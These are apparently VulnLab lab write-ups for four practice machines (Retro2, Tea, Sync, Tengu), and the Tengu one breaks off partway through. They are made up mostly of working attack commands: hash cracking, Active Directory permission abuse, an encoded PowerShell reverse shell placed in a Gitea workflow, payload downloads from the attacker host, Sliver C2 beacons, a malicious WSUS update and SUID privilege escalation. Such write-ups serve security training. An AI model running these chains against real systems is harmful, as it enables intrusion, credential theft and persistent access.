drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 DB
drw-rw-rw-          0  Sat Aug 17 13:58:07 2024 Temp
# cd DB
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
-rw-rw-rw-     876544  Sat Aug 17 16:30:34 2024 staff.accdb
# get staff.accdb

If we open it with Microsoft Access, it prompts for a password.  We use office2john to extract the hash and then crack it.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08          (staff.accdb)     

in accesdb we find
strsUser = “retro2\ldapreader”
strsPassword = “pp<redacted>5R”

Bloodhound analyze

bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip

we find:

The computer Account FS01 is a member of the Domain Computers group.
The Domain Computers group has GenericWrite over ADMWS01.
ADMWS01 has the AddSelf permission over the Services group.
Services group members can RDP to DC BLN01

.

we have guessed pasword computer is same as computername FS01 ,we cannot use this computer account, because the password has not been changed. so we use rpcchangepwd.py

wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Password was changed successfully.

abuse the GenericWrite permission

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\fs01$:P@ssw0rd 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'                                  
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE 

.

with BloodyAD we add ‘ldapreader’ to the Services group

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

now we can RDP into the box

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0 

Privesc

Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool’s name).

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion
.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_
2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
nt authority\system

c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}

That was oldschool fun

 

 

 

 

 

 

 

 

 

 

vulnlab-tea

vulnlab-tea

a medium rated AD chain machine, involved srv.tea.vl having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.

.

giteabuild

Create .gitea/workflows/demo.yaml file in the repository that we have created.

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

catch with netcat

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace

download & execute Beacon

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip

sliver (tea-3) >  

                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/tea]

.

sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 

.

.

netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)

.

evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

not finished yet

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe

.

SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

.

.

C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

 

.

┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)

.

Finaly

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389

.

catch the hashes

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

 

This was super fun.

.

 

vulnlab-sync

vulnlab sync

an easy linux box

nmap scan

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enum

rsync -av --list-only rsync://10.10.93.172/

using rsync getting the source file of website

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared

.

found that the hash is combination of three things $secure|$username|$password here the secure hash is working as salt

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat can crack this one

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt

We can now ftp to the box ,make a folder .ssh , and upload there our authorized_keys file (id_rsa.pub)

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.

.

ssh  -i ed_25519 triss@10.10.93.172

found a user in /etc/paswwd jenifier ,  su jennifer (with same pass as triss)

there is a zip file in the /backup directory that is  a backup owned by root.

timeout 60s ./pspy64

getting the zip

wget http://10.8.2.138:8000/1698154321.zip

unshadow

$ unshadow passwd shadow > unshadow

crack it

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

User sa has write permission to this shell script.

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

wait a minute

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

that’s all

 

 

vulnlab-tengu

vulnlab-tengu

a medium chain containing a ubuntu vm , a sql.tengu.vl and a  dc.tengu.vl ( all domain djoined)

noderedsh.py -> extracted krb5keytab- read gMSA -> delegate ->login to mssqlclient.py impersonate ->read pass domain admin pass with SharpDPAPI

node-red exploit [initial access]

a web service running named Node-RED on port 1880 which does not require authentication. We make a flow which executes a reverse shell on the target system:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
curl http://10.8.2.138/s.sh | bash

.

python3 -m http.server 80          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001       
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$ 
zsh: suspended  rlwrap nc -nlvp 443

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
nodered_svc@nodered:/opt/nodered/.node-red$ 
nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel
nodered_svc@nodered:/tmp$ chmod +x chisel
nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ chisel server -p 8000 --reverse 
2024/08/14 09:18:49 server: Reverse tunnelling enabled
2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc=
2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000
2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:445  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [+] nodered_connector:DreamPuppy<redacted>25 

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.139.246:1433  ...  OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA:  dbo
TABLE_NAME:    Task
TABLE_TYPE:    BASE TABLE
 
(1 row affected)
1> 

...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
 
name: tempdb
 
name: model
 
name: msdb
 
name: Demo
 
name: Dev
 
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID:       NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
 
(1 row affected)
1> 

.

crackstation.net
resolves  this hash to Tengu123

Checking credentials

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123'         
SMB         dc.tengu.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.tengu.vl:389  ...  OK
LDAP        dc.tengu.nl     389    DC               [+] tengu.vl\t2_m.winters:Tengu123 

 

Getting krb5.keytab

As this box is domaind joined, we are able to extract the machine ntlm hash from /etc/krb5.keytab by using https://github.com/sosdave/KeyTabExtract

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : TENGU.VL
    SERVICE PRINCIPAL : NODERED$/
    NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
    AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
    AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f

 

.

 

proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip

In Bloodhound we find he machine account NODERED$ has the permission ReadGMSAPassword

We can use netexec to retrieve the NTLM Hash for the account gMSA01$

──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
